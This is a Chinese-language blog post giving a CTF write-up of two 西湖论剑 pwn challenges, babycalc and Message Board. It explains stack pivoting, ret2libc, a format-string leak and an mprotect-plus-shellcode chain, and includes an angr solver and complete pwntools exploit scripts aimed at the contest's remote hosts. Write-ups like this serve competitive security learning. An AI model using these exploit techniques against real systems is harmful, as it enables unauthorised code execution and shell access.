

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/four.jpg">
  <link rel="icon" href="/img/four.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="xtxtn">
  <meta name="keywords" content="">
  
    <meta name="description" content="第一次打西湖论剑，只做出了两道pwn题，那个jit到最后也没能看明白😞。 babycalc如下图，输入0x100大小的数据可以修改栈上i的值，通过i与v3的偏移就可以修改栈上的任意一字节，而且输入后存在off-by-one  ​				 这里利用i与v3的偏移修改返回值为 leave ret的地址，只能更改一字节，这里修改为0x400C18，利用off-by-one改变rbp的值来实现栈迁移，具">
<meta property="og:type" content="article">
<meta property="og:title" content="西湖论剑-pwn">
<meta property="og:url" content="https://xtxtn.github.io/2023/02/07/xhlj-pwn/index.html">
<meta property="og:site_name" content="xtxtn&#39;s Blog">
<meta property="og:description" content="第一次打西湖论剑，只做出了两道pwn题，那个jit到最后也没能看明白😞。 babycalc如下图，输入0x100大小的数据可以修改栈上i的值，通过i与v3的偏移就可以修改栈上的任意一字节，而且输入后存在off-by-one  ​				 这里利用i与v3的偏移修改返回值为 leave ret的地址，只能更改一字节，这里修改为0x400C18，利用off-by-one改变rbp的值来实现栈迁移，具">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://xtxtn.github.io/img/11/Screenshot_20230208_111806.png">
<meta property="og:image" content="https://xtxtn.github.io/img/11/Screenshot_20230209_124709.jpg">
<meta property="og:image" content="https://xtxtn.github.io/img/11/Screenshot_20230216_102443.png">
<meta property="article:published_time" content="2023-02-07T05:11:29.337Z">
<meta property="article:modified_time" content="2023-02-16T14:32:59.982Z">
<meta property="article:author" content="xtxtn">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://xtxtn.github.io/img/11/Screenshot_20230208_111806.png">
  
  
  
  <title>西湖论剑-pwn - xtxtn&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"xtxtn.github.io","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>xtxtn</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/th.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="西湖论剑-pwn"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-02-07 13:11" pubdate>
          2023年2月7日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          38 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">西湖论剑-pwn</h1>
            
            
              <div class="markdown-body">
                
                <p>第一次打西湖论剑，只做出了两道pwn题，那个jit到最后也没能看明白😞。</p>
<h3 id="babycalc"><a href="#babycalc" class="headerlink" title="babycalc"></a>babycalc</h3><p>如下图，输入0x100大小的数据可以修改栈上<code>i</code>的值，通过<code>i</code>与v3的偏移就可以修改栈上的任意一字节，而且输入后存在off-by-one</p>
<p><img src="/img/11/Screenshot_20230208_111806.png" srcset="/img/loading.gif" lazyload></p>
<p>​				</p>
<p>这里利用<code>i</code>与v3的偏移修改返回值为 <code>leave ret</code>的地址，只能更改一字节，这里修改为0x400C18，利用off-by-one改变rbp的值来实现栈迁移，具体效果如下：</p>
<img src="/img/11/Screenshot_20230209_124709.jpg" srcset="/img/loading.gif" lazyload style="zoom:80%;" />

<p>​						</p>
<p>由于栈每次启动的地址不同，还需要爆破栈地址，再ret2libc。</p>
<p>​						</p>
<p>最后就是关于中间那个方程组的求解，我当时是直接头铁硬算的(其实还比较好算)，赛后听说angr也能将结果跑出来，自己也尝试做了一下angr的解法:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> angr<br><span class="hljs-keyword">import</span> claripy<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">Go</span>():<br>    proj = angr.Project(<span class="hljs-string">&#x27;./babycalc&#x27;</span>)<br>    <br>    start_addr = <span class="hljs-number">0x40080a</span><br>    init_state = proj.factory.blank_state(addr = start_addr)<br>    init_state.regs.rbp = init_state.regs.rsp<br>    init_state.regs.rsp -= <span class="hljs-number">0x100</span><br><br>    v3 = claripy.BVS(<span class="hljs-string">&#x27;v3&#x27;</span>, <span class="hljs-number">8</span>)<br>    v4 = claripy.BVS(<span class="hljs-string">&#x27;v4&#x27;</span>, <span class="hljs-number">8</span>)<br>    v5 = claripy.BVS(<span class="hljs-string">&#x27;v5&#x27;</span>, <span class="hljs-number">8</span>)<br>    v5 = claripy.BVS(<span class="hljs-string">&#x27;v5&#x27;</span>, <span class="hljs-number">8</span>)<br>    v6 = claripy.BVS(<span class="hljs-string">&#x27;v6&#x27;</span>, <span class="hljs-number">8</span>)<br>    v7 = claripy.BVS(<span class="hljs-string">&#x27;v7&#x27;</span>, <span class="hljs-number">8</span>)<br>    v8 = claripy.BVS(<span class="hljs-string">&#x27;v8&#x27;</span>, <span class="hljs-number">8</span>)<br>    v9 = claripy.BVS(<span class="hljs-string">&#x27;v9&#x27;</span>, <span class="hljs-number">8</span>)<br>    v10 = claripy.BVS(<span class="hljs-string">&#x27;v10&#x27;</span>, <span class="hljs-number">8</span>)<br>    v11 = claripy.BVS(<span class="hljs-string">&#x27;v11&#x27;</span>, <span class="hljs-number">8</span>)<br>    v12 = claripy.BVS(<span class="hljs-string">&#x27;v12&#x27;</span>, <span class="hljs-number">8</span>)<br>    v13 = claripy.BVS(<span class="hljs-string">&#x27;v13&#x27;</span>, <span class="hljs-number">8</span>)<br>    v14 = claripy.BVS(<span class="hljs-string">&#x27;v14&#x27;</span>, <span class="hljs-number">8</span>)<br>    v15 = claripy.BVS(<span class="hljs-string">&#x27;v15&#x27;</span>, <span class="hljs-number">8</span>)<br>    v16 = claripy.BVS(<span class="hljs-string">&#x27;v16&#x27;</span>, <span class="hljs-number">8</span>)<br>    v17 = claripy.BVS(<span class="hljs-string">&#x27;v17&#x27;</span>, <span class="hljs-number">8</span>)<br>    v18 = claripy.BVS(<span class="hljs-string">&#x27;v18&#x27;</span>, <span class="hljs-number">8</span>)<br>    val = [v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18]<br><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">16</span>):<br>        stack_addr = init_state.regs.rbp - <span class="hljs-number">0x30</span> + i<br>        init_state.memory.store(stack_addr, val[i])<br><br>    simgr = proj.factory.simgr(init_state)<br>    find_addr = <span class="hljs-number">0x400ba1</span><br>    simgr.explore(find = find_addr)<br>    <span class="hljs-keyword">if</span> simgr.found:<br>        solution_state = simgr.found[<span class="hljs-number">0</span>]<br>        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">16</span>):<br>            real_val = solution_state.solver.<span class="hljs-built_in">eval</span>(val[i])<br>            <span class="hljs-built_in">print</span>(real_val)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">raise</span> Exception(<span class="hljs-string">&#x27;Could not find!&#x27;</span>)<br>    <br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    Go()<br></code></pre></td></tr></table></figure>

<p>结果如下：</p>
<p><img src="/img/11/Screenshot_20230216_102443.png" srcset="/img/loading.gif" lazyload></p>
<p>😋好神奇！angr真滴强！</p>
<p>​							</p>
<p>完整exp</p>
<p>远程libc为2.23-0ubuntu11.3_amd64</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span>*<br>elf = ELF(<span class="hljs-string">&#x27;babycalc&#x27;</span>)<br>libc = elf.libc<br><span class="hljs-comment">#libc = ELF(&#x27;libc-2.23.so&#x27;)</span><br><span class="hljs-comment">#p = process(&#x27;./babycalc&#x27;)</span><br><span class="hljs-keyword">global</span> p<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">pwn</span>():<br>    pop_rdi = <span class="hljs-number">0x400ca3</span><br>    ret = pop_rdi + <span class="hljs-number">1</span><br>    rop1 = p64(pop_rdi) + p64(elf.got[<span class="hljs-string">&#x27;puts&#x27;</span>]) + p64(elf.plt[<span class="hljs-string">&#x27;puts&#x27;</span>]) + p64(ret) * <span class="hljs-number">0x10</span> +  p64(<span class="hljs-number">0x400650</span>) <span class="hljs-comment">#</span><br><br>    payload = <span class="hljs-string">b&#x27;24\n&#x27;</span>.ljust(<span class="hljs-number">0x28</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>)<br>    payload += rop1<br>    payload = payload.ljust(<span class="hljs-number">0xd0</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>)<br>    payload += p8(<span class="hljs-number">19</span>) + p8(<span class="hljs-number">36</span>) + p8(<span class="hljs-number">53</span>) + p8(<span class="hljs-number">70</span>) + p8(<span class="hljs-number">55</span>) + p8(<span class="hljs-number">66</span>) + p8(<span class="hljs-number">17</span>) + p8(<span class="hljs-number">161</span>)<br>    payload += p8(<span class="hljs-number">50</span>) + p8(<span class="hljs-number">131</span>) + p8(<span class="hljs-number">212</span>) + p8(<span class="hljs-number">101</span>) + p8(<span class="hljs-number">118</span>) + p8(<span class="hljs-number">199</span>) + p8(<span class="hljs-number">24</span>) + p8(<span class="hljs-number">3</span>)<br>    payload = payload.ljust(<span class="hljs-number">0xf8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>)<br>    payload += p32(<span class="hljs-number">0</span>) + p32((<span class="hljs-number">0x38</span>))<br>    p.sendafter(<span class="hljs-string">b&#x27;number&#x27;</span>, payload)<br><br>    p.recvuntil(<span class="hljs-string">b&#x27;\n&#x27;</span>)<br>    leak = u64(p.recvuntil(<span class="hljs-string">b&#x27;\x7f&#x27;</span>, timeout=<span class="hljs-number">1</span>).ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>))<br>    libcbase = leak - libc.sym[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>    <span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(libcbase))<br>    sys_addr = libcbase + libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]<br>    bin_sh = libcbase + libc.search(<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>).__next__()<br><br>    rop2 = p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(sys_addr)<br><br>    payload = <span class="hljs-string">b&#x27;24\n&#x27;</span>.ljust(<span class="hljs-number">0x48</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>)<br>    payload += rop2<br>    payload = payload.ljust(<span class="hljs-number">0xd0</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>)<br>    payload += p8(<span class="hljs-number">19</span>) + p8(<span class="hljs-number">36</span>) + p8(<span class="hljs-number">53</span>) + p8(<span class="hljs-number">70</span>) + p8(<span class="hljs-number">55</span>) + p8(<span class="hljs-number">66</span>) + p8(<span class="hljs-number">17</span>) + p8(<span class="hljs-number">161</span>)<br>    payload += p8(<span class="hljs-number">50</span>) + p8(<span class="hljs-number">131</span>) + p8(<span class="hljs-number">212</span>) + p8(<span class="hljs-number">101</span>) + p8(<span class="hljs-number">118</span>) + p8(<span class="hljs-number">199</span>) + p8(<span class="hljs-number">24</span>) + p8(<span class="hljs-number">3</span>)<br>    payload = payload.ljust(<span class="hljs-number">0xf8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>)<br>    payload += p32(<span class="hljs-number">0</span>) + p32((<span class="hljs-number">0x38</span>))<br><br>    <span class="hljs-comment">#gdb.attach(p)</span><br>    <span class="hljs-comment">#pause()</span><br>    p.sendafter(<span class="hljs-string">b&#x27;number&#x27;</span>, payload)<br>    <span class="hljs-comment">#pause()</span><br>    p.interactive()<br><br><span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>    <span class="hljs-keyword">try</span>:<br>        <span class="hljs-comment">#p = process(&#x27;./babycalc&#x27;)</span><br>        p = remote(<span class="hljs-string">&#x27;tcp.cloud.dasctf.com&#x27;</span>,<span class="hljs-number">26087</span>)<br>        pwn()<br>    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>        p.close()<br></code></pre></td></tr></table></figure>



<h3 id="Message-Board"><a href="#Message-Board" class="headerlink" title="Message Board"></a>Message Board</h3><p>格式化字符串泄漏<code>__libc_start_main</code>函数地址，利用栈迁移到bss段继续执行ROP，使用mprotect函数更改bss的执行权限，最后执行shellcode。</p>
<p>​								</p>
<p>完整exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment">#p = process(&quot;./pwn&quot;)</span><br>p = remote(<span class="hljs-string">&#x27;tcp.cloud.dasctf.com&#x27;</span>,<span class="hljs-number">22429</span>)<br>context.log_level=<span class="hljs-string">&quot;debug&quot;</span> <br>context(arch = <span class="hljs-string">&#x27;amd64&#x27;</span>, os = <span class="hljs-string">&#x27;linux&#x27;</span>)<br>elf = ELF(<span class="hljs-string">&#x27;pwn&#x27;</span>)<br>libc = elf.libc<br><br>bss = <span class="hljs-number">0x4040b0</span><br>pop_rdi = <span class="hljs-number">0x401413</span><br>leave_ret = <span class="hljs-number">0x4012e1</span><br><br>p.sendlineafter(<span class="hljs-string">b&#x27;Welcome to DASCTF message board, please leave your name:&#x27;</span>,<span class="hljs-string">b&#x27;%31$p&#x27;</span>)<br>p.recvuntil(<span class="hljs-string">b&#x27;0x&#x27;</span>)<br>leak = <span class="hljs-built_in">int</span>(p.recvuntil(<span class="hljs-string">b&#x27;\n&#x27;</span>, drop=<span class="hljs-literal">True</span>), <span class="hljs-number">16</span>)<br>libcbase = leak - <span class="hljs-number">243</span> - libc.sym[<span class="hljs-string">&#x27;__libc_start_main&#x27;</span>]<br>pop_rsi = libcbase + <span class="hljs-number">0x2601f</span><br>pop_rdx = libcbase + <span class="hljs-number">0x142c92</span><br>mprotect = libcbase + libc.sym[<span class="hljs-string">&#x27;mprotect&#x27;</span>]<br><br>payload = <span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0xb0</span> + p64(bss + <span class="hljs-number">0xb0</span>) + p64(<span class="hljs-number">0x40136C</span>)<br>p.sendafter(<span class="hljs-string">b&#x27;Now, please say something to DASCTF:&#x27;</span>, payload)<br><br>payload = flat(<br>    p64(pop_rdi), p64(bss - <span class="hljs-number">0xb0</span>),<br>    p64(pop_rsi), p64(<span class="hljs-number">0x1000</span>),<br>    p64(pop_rdx), p64(<span class="hljs-number">7</span>),<br>    p64(mprotect),<br>    p64(bss + <span class="hljs-number">0x40</span>)<br>)<br>payload += asm(shellcraft.cat(<span class="hljs-string">&#x27;/flag&#x27;</span>))<br>payload = payload.ljust(<span class="hljs-number">0xb0</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>)<br>payload += p64(bss -<span class="hljs-number">8</span>) + p64(leave_ret)<br>p.sendafter(<span class="hljs-string">&#x27;Now, please say something to DASCTF:&#x27;</span>, payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>西湖论剑-pwn</div>
      <div>https://xtxtn.github.io/2023/02/07/xhlj-pwn/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>xtxtn</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年2月7日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2023年2月16日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
                <a target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="NC - 非商业性使用">
                    <i class="iconfont icon-nc"></i>
                  </span>
                </a>
              
                <a target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="SA - 相同方式共享">
                    <i class="iconfont icon-sa"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/03/14/pwnhub3%E6%9C%88%E5%85%AC%E5%BC%80%E8%B5%9B&amp;&amp;%E5%86%85%E9%83%A8%E8%B5%9B/" title="pwnhub3月公开赛&amp;&amp;内部赛">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">pwnhub3月公开赛&amp;&amp;内部赛</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/02/07/hgame-week4-pwn/" title="hgame-week4-pwn">
                        <span class="hidden-mobile">hgame-week4-pwn</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
